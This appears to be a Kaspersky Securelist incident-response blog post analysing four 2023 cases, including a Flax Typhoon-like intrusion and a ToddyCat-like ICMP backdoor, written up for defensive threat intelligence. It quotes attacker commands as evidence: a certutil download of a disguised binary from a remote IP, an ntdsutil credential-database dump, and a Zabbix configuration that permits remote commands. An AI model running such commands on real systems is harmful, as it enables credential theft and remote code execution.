1/13
securelist.com
/incident-response-interesting-cases-2023/113611/
A deep dive into the most interesting incident response
cases of last year
Eduardo Ovalle ⋮ ⋮ 9/3/2024
Authors

Eduardo Ovalle

Ahmad Zaidi Said

AbdulRhman Alfaifi
In 2023, Kaspersky’s Global Emergency Response Team (GERT) participated in services around the
world that allowed our experts to gain insight into various threats and techniques used by APT groups,
common crimeware and, in some cases, internal adversaries. As we highlighted in our annual report, the
most prominent threat in 2023 was ransomware, and the Government vertical was the sector that most
frequently requested digital forensics, incident response and malware analysis (DFIRMA) services. While
file encryption was the most common threat last year, this post proposes a deep dive into specific cases
that caught our attention and were mentioned during our annual DFIRMA report webinar.
The insider fraud attack
2/13
A group of collaborators at a government organization identified an internal service that allowed the
creation of legitimate transactions that weren’t direct money transfers, but could result in monetary losses
for the organization. These losses could reach millions of dollars.
The following scenario (not related to a specific customer) could be considered an example of such
misuse of an internal service:
A bank only allows a customer to open a maximum of two bank accounts for free, with the
customer paying a fee to open additional accounts. However, the adversary used the internal
system to create multiple bank accounts for individual customers, who avoided paying the
required fees in exchange for a payment to the adversary. As a result of this incident, the
organization reported a loss of more than $20 million.
Many logs related to the application in question, as well as VPN access and network activity, were
requested for analysis and the employees involved in the fraudulent activity were identified. Two different
cases were analyzed in which the abuse of transaction configuration was confirmed, one by exploiting a
vulnerability in a debugging interface and the other by misusing privileges in a valid account.
In the first case, GERT identified a misconfiguration that was abused by the adversaries to steal cookies
from other users to impersonate them and their activity. An application on one of the analyzed systems
registered exception logging details that included cookies for the user that encountered the exception,
allowing us to determine the user involved.
In the other case, one of the users modified the privileges and details of another user, impersonating that
user to create additional transactions in the internal service and attempting to hide the original details.
Later, this newly modified user accessed the VPN from a previously known system where another user
was accessing the transaction system for what was initially catalogued as legitimate activity, but which
was recently confirmed to be part of the malicious activity.
3/13
Most of the criminal activity was performed by accessing the infrastructure through the VPN, but it was
discovered that a new user was accessing the transaction system from the internal network using the
same unauthorized behavior.
The results of the GERT team’s analysis confirmed the collusion of a user involved in the transaction
requests and managed to identify the sources and link the user activity to various systems involved in the
investigation, including local and remote IDs. This information was used by the customer in a timely
manner to take legal action against the insider employee and his accomplices.
Mitre ATT&CK techniques
Tactic
Technique used
Technique ID
Details
Initial Access

Persistence
Valid Accounts
T1078
The adversaries used
legitimate credentials to
access the VPN and
the internal service
Initial Access
External Remote
Services
T1133
The adversary used the
сustomer’s VPN
service to gain network
access to the internal
service
Credential Access
Steal Web Session
Cookie
T1539
The adversary abused
a misconfiguration in
the transactions service
to steal other users’
cookies.
Impact
Data Manipulation
T1565
After impersonating
other users with
privileges to create
transactions, the
adversary started
creating unauthorized
transactions on their
behalf.
Flax Typhoon/SLIME13 APT attack
4/13
After enabling Kaspersky Managed Detection and Response (MDR) in a customer’s infrastructure, our
platforms detected the presence of well-known software installed on the customer’s premises without
their knowledge.
Although these applications were legitimate, attackers used them to gain persistent access to the victim’s
environment.
In September 2023, Kaspersky MDR detected a suspicious service on a corporate host. The adversaries
used a technique that mimicked the real system application name conhost.exe, but the service was
started from a non-standard folder. GERT’s analysis confirmed that the application wasn’t a system
service, but was instead associated with SoftEther VPN, a legitimate multi-protocol VPN software.
The supposed conhost application was downloaded to the system by a legitimate local user using the
well-known Windows LOLBin certutil, and then installed via command line as a system service:
1 certutil.exe -urlcache -split -f hxxp://<Public IP>/conhost.exe
Another suspicious service masquerading as wshelper.dll was observed on another host. This DLL was
associated with Zabbix agent, which is typically deployed on a monitoring target to actively monitor local
resources and applications.
Analysis of the sample confirmed that the configuration file was set to allow remote commands, taking
advantage of passive and active checks enabled by Zabbix.
1
2
3
4
EnableRemoteCommands=1
LogFile=0
Server=0.0.0.0/0
ListenPort=5432
5/13
Port 5432 was configured in a firewall rule to allow listening, with the “smart” name PGSQL to make it
look legitimate.
GERT’s analysis confirmed that the intrusion lasted more than two years. In the early stages of the
attack, an NTDS dump was created using system commands:
1
2
cmd /c ntdsutil "ac i ntds" ifm "create full c:\PerfLogs\test"  q  q
c:\windows\sysvol\domain\ntds\active directory\ntds.dit"
During those two years of intrusion, security controls detected and contained multiple attempts to execute
pentesting applications such as Mimikatz and CobaltStrike, but all the repurposed legitimate software
remained invisible until the customer decided to implement our MDR solution. GERT analysis confirmed
that the infrastructure had been compromised since mid-2021. The artifacts and TTPs of the attackers
are similar to those used by the Flax Typhoon APT group, which employs minimal malware and custom
payloads, but relies heavily on legitimate applications instead.
Mitre ATT&CK techniques
Tactic
Technique used
Technique ID
Initial Access
Exploit Public-Facing Application
T1190
Resource Development Develop Capabilities: Malware
T1587.001
Credential Access
OS Credential Dumping: LSASS Memory
T1003.001
Credential Access
OS Credential Dumping: Security Account
Manager
T1003.002
Command And Control Protocol Tunneling
T1572
Command And Control Ingress Tool Transfer
T1105
Credential Access
Brute Force: Password Spraying
T1110.003
Execution
Exploitation for Client Execution
T1203
Lateral Movement
Remote Services: Remote Desktop Protocol
T1021.001
Lateral Movement
Remote Services: SMB/Windows Admin Shares T1021.002
Defense Evasion
Masquerading: Match Legitimate Name or
Location
T1036 .005
The MFA lack of control
6/13
After enabling multi-factor authentication (MFA) for its “critical employees”, a financial company was
targeted by a spear-phishing attack.
The phishing attack spoofed the popular DocuSign platform and was directed at a specific group of
employees. Although the company detected the phishing attack and configured rules to avoid receiving
similar emails, some users received and opened the malicious email.
Among those who unwittingly opened the link was one of the protected users. The attackers were able to
take control of his account thanks to the implementation of a phishing kit configured to automatically steal
the MFA tokens.
The initial phishing attack occurred on October 6, 2023, and GERT analysts confirmed that one of the
targeted users opened the malicious email the same day, which was followed by new connections
opened from different locations outside the company’s headquarters. The attackers also configured
additional MFA devices to access the target user’s mailbox contents without being noticed and without
tampering with the original mailbox.
The attackers accessed the contents of the mailbox for a few days, allowing them to understand internal
processes and prepare a BEC attack.
One month after the initial access, the attackers compromised a privileged email account (where MFA
was not enabled). This new account had privileges in Microsoft 365, which allowed new rules and
parameters to be configured. The attackers configured “send as” privileges on behalf of critical users,
such as money transfer approvers and requesters. The adversaries also used this account to configure
forwarding rules to hide messages received from a specific bank and from specific users.
Once the necessary privileges and rules were configured, the attackers sent a new email request using a
legitimate template previously used in the company to request money transfers and attached documents
7/13
collected from the original compromised account, but with a different destination bank account,
requesting an international transfer of more than $300,000.
Upon receiving the request, the bank processed the transfer as usual based on the legitimate source and
attached documents.
A notification was sent to the customer from an email address belonging to the bank, confirming the
transfer. However, this email address wasn’t listed in the attackers’ forwarding rules, so the message was
delivered to the customer’s mailbox. After receiving this message, the customer decided to investigate
the user responsible for the privileged mail account.
GERT’s analysis confirmed the initial attack date and vector, the compromised users, and all the
techniques used by the threat actors, and provided a set of recommendations for protecting and
monitoring cloud assets. By analyzing user access logs (UAL) and additional cloud logs, as well as
firewall logs and the client’s own system logs, GERT was able to provide a complete timeline detailing all
the techniques used by the fraudsters.
Mitre ATT&CK techniques
Tactic
Technique used
Technique ID
Details
Initial Access
Phishing: Spear phishing
Link
T1566.002
Targeted attack against
customer domain from
October 6, 2023
Persistence
Account Manipulation:
Device Registration
T1098.005
Multiple authentication
methods enabled for a
compromised user
Credential Access Brute Force: Password
Guessing
T1110.001
Failed access on behalf of
multiple users
Credential Access Brute Force: Password
Spraying
T1110.003
Tests for attempted access
using credentials confirmed
as stolen by Malware
Stealers
Privilege
Escalation
Account Manipulation:
Additional Email Delegate
Permissions
T1098.002
New permission configured
to avoid detection and to
access different mailboxes
Persistence
Email Collection: Email
Forwarding Rule
T1114.003
New rules configured to
evade detection and remain
persistent
ToddyCat-like APT attack with an ICMP backdoor
8/13
Kaspersky’s Managed and Detection Response service (MDR) was alerted to suspicious activity on
domain controllers and Exchange servers.
GERT was contacted to investigate the case; our analysis confirmed SMB abuse and IKEEXT service
exploitation, as well as exploitation of the Microsoft Exchange server remote code execution vulnerability
(CVE-2021-26855).
One interesting finding was the use of IKEEXT for persistence. The vulnerability used by the attackers,
along with the exploit for it, was first published by High-Tech Bridge Security Research Lab in 2012. It
was associated with the wlbsctrl.dll library and originally used for privilege escalation. Shortly after the
exploit was published, Microsoft patched the vulnerability. However, our analysts confirmed that the same
library is now being used as a persistence mechanism for malware.
IKEEXT is a default service on Windows. It is invoked by the svchost process, which loads ikeext.dll, the
DLL responsible for the IKEEXT service.
The ikeext.dll library, in turn, is responsible for loading a DLL named wlbsctrl.dll, which is default
Windows behavior. However, while the svchost service always runs on the system, wlbsctrl.dll does not
exist in the file system by default, and this where threat actors saw an opportunity.
9/13
The threat actors created a malicious version of wlbsctrl.dll and saved it on the system. Based on
Windows behavior, this DLL was executed every time without requiring registration in Autorun, which is
commonly used for persistence.
10/13
Besides persistence, in the investigated incident the threat actor used the IKEEXT vulnerability to perform
lateral movement via the SMB protocol and created a custom firewall rule named DLL Surrogate that
permits dllhost.exe to listen on custom port 52415. All this was achieved by placing the backdoored
wlbsctrl.dll into the system32 folder where the legitimate library is normally stored (if present on the
system).
Later, the attacker implemented an ICMP backdoor. Once the backdoor was identified, Kaspersky verified
and detected two more in-the-wild samples outside the customer’s infrastructure. All the discovered
samples were similar except for the following points:
Some differences in the PE header (normal behavior between similar samples);
Different mutex strings, all located at the same raw file offset;
Different bytes at the raw file offset 0x452–0x483, which are apparently useless (non-actionable)
code.
Based on GERT’s analysis, the backdoor acted like a loader, configured to execute the following
activities:
Check for the mutex; if it already exists in memory, terminate the process.
Attempt to read the file %WINDIR%\Microsoft.NET\Framework\sbs_clrhost.res; decrypt its contents
using the AES algorithm with a hardcoded KEY and a KEY derived from the volume serial number
(VSN) of the C drive, then use it to set the value of the registry key “SOFTWARE\Classes\Interface
{<calculated_for_each_host>}”, and then delete the file.
Load the contents of the default value of registry key “SOFTWARE\Classes\Interface
{<calculated_for_each_host>}”, decrypt it again with AES using the same KEY described above,
and invoke the payload shellcode.
Allocate the shellcode size in a new segment and jump to it.
Note: The calculated REGKEY NAME (Interface {<calculated_for_each_host>}) is based on the VSN of
the C drive (without host VSN it is not possible to decrypt correctly).
11/13
As part of the analysis, GERT identified a payload stored in the Windows registry and analyzed it,
confirming the following behavior in the encrypted payload.
The decrypted payload has the header “CAFEBABE” (hex bytes magic related to Java Class files)
followed by the shellcode size and finally the data. This payload executes the following commands:
1. Decrypt itself (for the third time);
2. If not running under exe, create a suspended dllhost process with the parameter “/Processid:
{02D4B3F1-FD88-11D1-960D-00805FC79235}”, which refers to a COM+ system application
service;
3. Allocate space to the new process;
4. Write a section of the decrypted payload (starting at offset 0x1A03, and having a size that’s
contained in the small header at offset 0x19FF) into the new allocation;
5. Patch dllhost (in memory only) to ensure execution at the newly allocated space;
12/13
6. Resume the dllhost process.
A new instance of the shellcode starts from step one. It finds that it is actually running under dllhost,
decrypts a new section, executes it and listens on port 52415. The final payload injected into dllhost.exe
appears to create a raw ICMP socket with no port. No outbound connection is made (although the
received payload likely communicates outbound). Data is received from an unknown source in a Base64-
encoded ICMP packet, converted to binary, decrypted, and executed via direct execution of data
(allocating space using the VirtualAlloc function), copying shellcode to the allocated space, making a
direct call to the allocated space.
According to our threat intelligence platforms, this threat has similarities to APT attacks: the attack
Tactics, Techniques and Procedures (TTP) used are very similar to the ToddyCat actor, but there’s no
solid attribution to this group.
The objective of the threat actor was to gain persistence for monitoring and future impact, but no other
objectives were confirmed based on the evidence obtained.
Mitre ATT&CK techniques
Tactic
Technique used
Technique ID
Resource Development
Develop Capabilities: Exploits
T1587.004
Resource Development
Develop Capabilities: Malware
T1587.001
Initial Access
Valid Accounts: Domain Accounts
T1078.002
Initial Access
Valid Accounts: Local Accounts
T1078.003
Execution
System Services: Service Execution
T1569.002
Execution
User Execution: Malicious File
T1204.002
Persistence
Create or Modify System Process: Windows
Service
T1543.003
Persistence
Hijack Execution Flow: DLL Side-Loading
T1574.002
Persistence
Server Software Component: Web Shell
T1505.003
Persistence
Valid Accounts: Domain Accounts
T1078.002
Defense Evasion
Abuse Elevation Control Mechanism: Bypass
User Account Control
T1548.002
Defense Evasion
Direct Volume Access
T1006
Defense Evasion
Modify Registry
T1112
Defense Evasion
Impair Defenses: Disable or Modify System
Firewall
T1562.004
Defense Evasion
Impair Defenses: Disable Windows Event
Logging
T1562.002
Defense Evasion
Indicator Removal: Clear Windows Event Logs
T1070.001
Defense Evasion
Indicator Removal: File Deletion
T1070.004
Defense Evasion
Impair Defenses: Impair Command History
Logging
T1562.003
Command And Control
Non-Application Layer Protocol
T1095
Conclusions
13/13
Although statistics show the government sector was the most targeted vertical last year, it is clear that
threat and crimeware actors do not care which vertical their potential targets belong to. To stay ahead of
the attackers, the best course of action is to assess your asset inventory and continue to monitor and
protect it.
The trend of cyberattacks and intrusions making use of infrastructure assets or legitimate on-premises
applications creates the need to enable additional layers of monitoring based on threat intelligence. The
implementation of MDR has been one of the recurring triggers for new investigations thanks to its
detection capabilities and the ability of analysts to determine timely courses of action.
To learn more about our Incident Response report, we invite you to view the recording of the webinar
“Analyzing last year’s cyber incident cases”.
